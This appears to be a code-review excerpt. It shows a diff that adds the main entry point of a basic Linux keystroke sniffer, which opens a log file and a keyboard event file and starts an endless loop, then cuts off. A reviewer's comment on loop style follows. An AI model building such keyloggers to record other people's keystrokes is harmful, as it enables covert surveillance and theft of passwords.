basic-linux-keysniffer/main.cpp

```diff
@@ -0,0 +1,23 @@
+#include <iostream>
+#include "io/keyboardEventReader.h"
+#include "utils/keyboardEventUtils.h"
+#include "io/utils.h"
+
+int main(int argc, char **argv) {
+    if (argc != 2) {
+        std::cerr << "USAGE: sniffer FILENAME" << std::endl;
+        exit(1);
+    }
+    std::string outputFileName = argv[1];
+    std::ofstream outputFile{outputFileName, std::iostream::app};
+    SnifferIO::checkFileStream(outputFile, outputFileName);
+
+    std::ifstream keyboardEventFile = KeyboardEventReader::getKeyboardEventFile();
+
+    while (true) {
```

Comment:
I personally like to write "for (;;)" >:D (don't have to do this)
Logically "for (;;)" doesn't check any condition like "while (true)" does and just loops indefinitely, but good compilers generate the same code anyway.